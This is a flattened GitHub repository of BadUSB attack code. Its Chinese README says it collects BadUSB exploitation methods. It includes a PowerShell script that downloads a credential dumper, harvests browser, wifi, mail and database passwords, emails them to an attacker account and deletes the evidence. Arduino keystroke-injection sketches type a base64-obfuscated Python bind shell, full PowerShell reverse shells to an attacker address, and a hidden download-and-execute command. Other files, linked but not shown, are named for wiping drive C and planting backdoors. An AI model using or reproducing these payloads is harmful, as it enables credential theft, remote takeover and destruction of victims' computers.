├── Command.rar ├── GetPass.ps1 ├── GetPass.rar ├── README.md ├── ino_code ├── BlueScreen(xp,win7).ino ├── ChangeCurrentUserPass(all).ino ├── DeleteDiskCFiles(all).ino ├── KaliPWN.ino ├── PowerShellDownload(win7,8).ino ├── SetBackdoor(all).ino ├── local_reverse_shell.ino ├── ps_download_execute_Leonrado.ino └── ps_reverse_shell(all_with_ps).ino └── main.ps1 /Command.rar: -------------------------------------------------------------------------------- 1 | (D:\Get.exe sysadmin & D:\Get.exe svn & D:\Get.exe database & D:\Get.exe browsers & D:\Get.exe wifi & D:\Get.exe mails) > D:\GetPass.txt -------------------------------------------------------------------------------- /GetPass.ps1: -------------------------------------------------------------------------------- 1 | (new-object System.Net.WebClient).DownloadFile('http://www.xxx.xxx/GetPass.rar','D:\Get.exe'); 2 | 3 | (new-object System.Net.WebClient).DownloadFile('http://www.xxx.xxx/Command.rar','D:\Command.bat'); 4 | 5 | D:\Command.bat; 6 | $SMTPServer = 'smtp.qq.com' 7 | 8 | $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 9 | 10 | $SMTPInfo.EnableSsl = $true 11 | 12 | $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxxx@qq.com', 'olawgxxxxxxx'); 13 | 14 | $ReportEmail = New-Object System.Net.Mail.MailMessage 15 | 16 | $ReportEmail.From = 'xxxxx@qq.com' 17 | 18 | $ReportEmail.To.Add('xxxxx@qq.com') 19 | 20 | $ReportEmail.Subject = 'GetPass' 21 | 22 | $ReportEmail.Body = 'GetPass_text' 23 | 24 | $ReportEmail.Attachments.Add('D:\GetPass.txt') 25 | $SMTPInfo.Timeout = 1000000 26 | $SMTPInfo.Send($ReportEmail) 27 | $ReportEmail.Attachments.Dispose() 28 | 29 | remove-item 'D:\GetPass.txt' 30 | 31 | remove-item 'D:\Get.exe' 32 | -------------------------------------------------------------------------------- /GetPass.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/GetPass.rar -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BadUSB-code 2 | 收集badusb的一些利用方式及代码 3 | 4 | ino_code 中的.ino代码为上传到硬件的代码,无需服务器中配置。 5 | 6 | ##代码涉及OS版本 7 | 代码适用版本在文件名中用括号标明。 8 | - win xp,7,8,10 9 | - Kali 10 | 11 | ## 原理及制作可参考: 12 | [乐枕的家——BadUSB原理浅析及制作指南](https://www.cdxy.me/?p=549) 13 | 14 | 特别感谢HackPanda大牛的代码和技术支持!向前辈学习! 15 | 16 | -------------------------------------------------------------------------------- /ino_code/BlueScreen(xp,win7).ino: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/BlueScreen(xp,win7).ino -------------------------------------------------------------------------------- /ino_code/ChangeCurrentUserPass(all).ino: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/ChangeCurrentUserPass(all).ino -------------------------------------------------------------------------------- /ino_code/DeleteDiskCFiles(all).ino: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/DeleteDiskCFiles(all).ino -------------------------------------------------------------------------------- /ino_code/KaliPWN.ino: -------------------------------------------------------------------------------- 1 | /** 2 | * File: Arduino sketchup for Arduino Micro. 3 | * Arduino opens up gnome-terminal, runs python shell, and changes background 4 | * Python shell opens up on 1338 unless edited. 5 | * Background is set to http://i.imgur.com/3Novb98.jpg 6 | * This attack is designed or Kali Linux systems. 7 | */ 8 | 9 | void f2Run(char command[]) { 10 | Keyboard.press(KEY_LEFT_ALT); 11 | Keyboard.press(KEY_F2); 12 | delay(200); 13 | Keyboard.releaseAll(); 14 | delay(500); 15 | Keyboard.begin(); 16 | Keyboard.print(command); 17 | Keyboard.end(); 18 | delay(100); 19 | Keyboard.press(KEY_RETURN); 20 | delay(100); 21 | Keyboard.releaseAll(); 22 | delay(100); 23 | } 24 | 25 | void runCommand(char command[]) { 26 | Keyboard.begin(); 27 | Keyboard.print(command); 28 | Keyboard.end(); 29 | delay(100); 30 | Keyboard.press(KEY_RETURN); 31 | delay(100); 32 | Keyboard.releaseAll(); 33 | delay(100); 34 | } 35 | 36 | void gnomeTerminal() { 37 | f2Run("gnome-terminal"); 38 | delay(1500); 39 | } 40 | 41 | void shell() { 42 | // python shell 43 | runCommand("python -c \"import base64;p=1338;eval(compile(base64.b64decode('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcwpoID0gJycKI3AgPSAxMzM4CnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCnMuc2V0c29ja29wdChzb2NrZXQuU09MX1NPQ0tFVCwgc29ja2V0LlNPX1JFVVNFQUREUiwgMSkKcy5iaW5kKChoLCBwKSkKcy5saXN0ZW4oMTApCndoaWxlIDE6CiAgYywgYWRkcmVzcyA9IHMuYWNjZXB0KCkKICB3aGlsZSAxOgogICAgZCA9IGMucmVjdigxMDI0KQogICAgaWYgKGQgPT0gIiIpOgogICAgICBicmVhawogICAgYy5zZW5kKHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KGQsIHNoZWxsPVRydWUpKQogIGMuY2xvc2UoKQpzLmNsb3NlKCkK'), '', 'exec'));\" &"); 44 | } 45 | 46 | void wallpaper() { 47 | // Image payloads are too big, sticking with wget. 48 | runCommand("wget http://i.imgur.com/3Novb98.jpg;gsettings set org.gnome.desktop.background picture-uri file://`pwd`/3Novb98.jpg;gsettings set org.gnome.desktop.background picture-options \"centered\""); 49 | } 50 | 51 | void setup() { 52 | Serial.begin(9600); 53 | } 54 | 55 | void loop() { 56 | delay(3000); 57 | gnomeTerminal(); 58 | shell(); 59 | wallpaper(); 60 | runCommand("exit"); 61 | delay(60000); 62 | } 63 | -------------------------------------------------------------------------------- /ino_code/PowerShellDownload(win7,8).ino: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/PowerShellDownload(win7,8).ino -------------------------------------------------------------------------------- /ino_code/SetBackdoor(all).ino: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Xyntax/BadUSB-code/a2b1c8665961728b1d158068695cbd9d6f7d729b/ino_code/SetBackdoor(all).ino -------------------------------------------------------------------------------- /ino_code/local_reverse_shell.ino: -------------------------------------------------------------------------------- 1 | void setup() { 2 | // put your setup code here, to run once: 3 | //reverse_shell via cmd(local) 4 | delay(5000); 5 | Keyboard.press(KEY_LEFT_CTRL); 6 | Keyboard.press(KEY_ESC); 7 | Keyboard.releaseAll(); 8 | delay(500); 9 | 10 | Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); 11 | Keyboard.press(KEY_LEFT_CTRL); 12 | Keyboard.press(KEY_LEFT_SHIFT); 13 | Keyboard.press(KEY_RETURN); 14 | Keyboard.releaseAll(); 15 | delay(2500); 16 | 17 | Keyboard.press(KEY_LEFT_ALT); 18 | Keyboard.press('y'); 19 | Keyboard.releaseAll(); 20 | delay(1500); 21 | Keyboard.println("powershell"); 22 | delay(200); 23 | Keyboard.println("function cleanup {"); 24 | Keyboard.println("if ($client.Connected -eq $true) {$client.Close()}"); 25 | Keyboard.println("if ($process.ExitCode -ne $null) {$process.Close()}"); 26 | Keyboard.println("exit}"); 27 | // Setup 192.168.202.130 HERE 28 | Keyboard.println("$address = '192.168.1.8'"); 29 | // Setup PORT HERE 30 | Keyboard.println("$port = '8000'"); 31 | Keyboard.println("$client = New-Object system.net.sockets.tcpclient"); 32 | Keyboard.println("$client.connect($address,$port)"); 33 | Keyboard.println("$stream = $client.GetStream()"); 34 | Keyboard.println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); 35 | Keyboard.println("$process = New-Object System.Diagnostics.Process"); 36 | Keyboard.println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); 37 | Keyboard.println("$process.StartInfo.RedirectStandardInput = 1"); 38 | Keyboard.println("$process.StartInfo.RedirectStandardOutput = 1"); 39 | Keyboard.println("$process.StartInfo.UseShellExecute = 0"); 40 | Keyboard.println("$process.Start()"); 41 | Keyboard.println("$inputstream = $process.StandardInput"); 42 | Keyboard.println("$outputstream = $process.StandardOutput"); 43 | Keyboard.println("Start-Sleep 1"); 44 | Keyboard.println("$encoding = new-object System.Text.AsciiEncoding"); 45 | Keyboard.println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); 46 | Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); 47 | Keyboard.println("$out = $null; $done = $false; $testing = 0;"); 48 | Keyboard.println("while (-not $done) {"); 49 | Keyboard.println("if ($client.Connected -ne $true) {cleanup}"); 50 | Keyboard.println("$pos = 0; $i = 1"); 51 | Keyboard.println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {"); 52 | Keyboard.println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); 53 | Keyboard.println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); 54 | Keyboard.println("if ($pos -gt 0) {"); 55 | Keyboard.println("$string = $encoding.GetString($networkbuffer,0,$pos)"); 56 | Keyboard.println("$inputstream.write($string)"); 57 | Keyboard.println("start-sleep 1"); 58 | Keyboard.println("if ($process.ExitCode -ne $null) {cleanup}"); 59 | Keyboard.println("else {"); 60 | Keyboard.println("$out = $encoding.GetString($outputstream.Read())"); 61 | Keyboard.println("while($outputstream.Peek() -ne -1){"); 62 | Keyboard.println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); 63 | Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); 64 | Keyboard.println("$out = $null"); 65 | Keyboard.println("$string = $null}} else {cleanup}}"); 66 | Keyboard.println(""); //Enter to start execution 67 | 68 | } 69 | 70 | void loop() { 71 | // put your main code here, to run repeatedly: 72 | 73 | } 74 | -------------------------------------------------------------------------------- /ino_code/ps_download_execute_Leonrado.ino: -------------------------------------------------------------------------------- 1 | void setup() { 2 | delay(5000); 3 | Keyboard.press(KEY_LEFT_CTRL); 4 | Keyboard.press(KEY_ESC); 5 | Keyboard.releaseAll(); 6 | delay(500); 7 | 8 | Keyboard.print("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://www.cdxy.me/main.ps1');"); 9 | Keyboard.press(KEY_LEFT_CTRL); 10 | Keyboard.press(KEY_LEFT_SHIFT); 11 | Keyboard.press(KEY_RETURN); 12 | Keyboard.releaseAll(); 13 | delay(2500); 14 | 15 | Keyboard.press(KEY_LEFT_ALT); 16 | Keyboard.press('y'); 17 | Keyboard.releaseAll(); 18 | delay(1500); 19 | 20 | } 21 | 22 | void loop() {} 23 | 24 | -------------------------------------------------------------------------------- /ino_code/ps_reverse_shell(all_with_ps).ino: -------------------------------------------------------------------------------- 1 | void setup() { 2 | // reverse_shell with powershell(hidden) 3 | // edit by xy 16.01.24 4 | // mail:i@cdxy.me 5 | 6 | delay(5000); 7 | Keyboard.press(KEY_LEFT_CTRL); 8 | Keyboard.press(KEY_ESC); 9 | Keyboard.releaseAll(); 10 | delay(500); 11 | 12 | Keyboard.print("powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden"); 13 | Keyboard.press(KEY_LEFT_CTRL); 14 | Keyboard.press(KEY_LEFT_SHIFT); 15 | Keyboard.press(KEY_RETURN); 16 | Keyboard.releaseAll(); 17 | delay(2500); 18 | 19 | Keyboard.press(KEY_LEFT_ALT); 20 | Keyboard.press('y'); 21 | Keyboard.releaseAll(); 22 | delay(1500); 23 | //Keyboard.println("powershell"); 24 | //delay(200); 25 | Keyboard.println("function cleanup {"); 26 | Keyboard.println("if ($client.Connected -eq $true) {$client.Close()}"); 27 | Keyboard.println("if ($process.ExitCode -ne $null) {$process.Close()}"); 28 | Keyboard.println("exit}"); 29 | // Setup 192.168.202.130 HERE 30 | Keyboard.println("$address = 'xxx.xxx.xxx.xxx'"); 31 | // Setup PORT HERE 32 | Keyboard.println("$port = '4444'"); 33 | Keyboard.println("$client = New-Object system.net.sockets.tcpclient"); 34 | Keyboard.println("$client.connect($address,$port)"); 35 | Keyboard.println("$stream = $client.GetStream()"); 36 | Keyboard.println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); 37 | Keyboard.println("$process = New-Object System.Diagnostics.Process"); 38 | Keyboard.println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); 39 | Keyboard.println("$process.StartInfo.RedirectStandardInput = 1"); 40 | Keyboard.println("$process.StartInfo.RedirectStandardOutput = 1"); 41 | Keyboard.println("$process.StartInfo.UseShellExecute = 0"); 42 | Keyboard.println("$process.Start()"); 43 | Keyboard.println("$inputstream = $process.StandardInput"); 44 | Keyboard.println("$outputstream = $process.StandardOutput"); 45 | Keyboard.println("Start-Sleep 1"); 46 | Keyboard.println("$encoding = new-object System.Text.AsciiEncoding"); 47 | Keyboard.println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); 48 | Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); 49 | Keyboard.println("$out = $null; $done = $false; $testing = 0;"); 50 | Keyboard.println("while (-not $done) {"); 51 | Keyboard.println("if ($client.Connected -ne $true) {cleanup}"); 52 | Keyboard.println("$pos = 0; $i = 1"); 53 | Keyboard.println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {"); 54 | Keyboard.println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); 55 | Keyboard.println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); 56 | Keyboard.println("if ($pos -gt 0) {"); 57 | Keyboard.println("$string = $encoding.GetString($networkbuffer,0,$pos)"); 58 | Keyboard.println("$inputstream.write($string)"); 59 | Keyboard.println("start-sleep 1"); 60 | Keyboard.println("if ($process.ExitCode -ne $null) {cleanup}"); 61 | Keyboard.println("else {"); 62 | Keyboard.println("$out = $encoding.GetString($outputstream.Read())"); 63 | Keyboard.println("while($outputstream.Peek() -ne -1){"); 64 | Keyboard.println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); 65 | Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); 66 | Keyboard.println("$out = $null"); 67 | Keyboard.println("$string = $null}} else {cleanup}}"); 68 | Keyboard.println(""); //Enter to start execution 69 | 70 | } 71 | 72 | void loop() { 73 | // put your main code here, to run repeatedly: 74 | 75 | } 76 | --------------------------------------------------------------------------------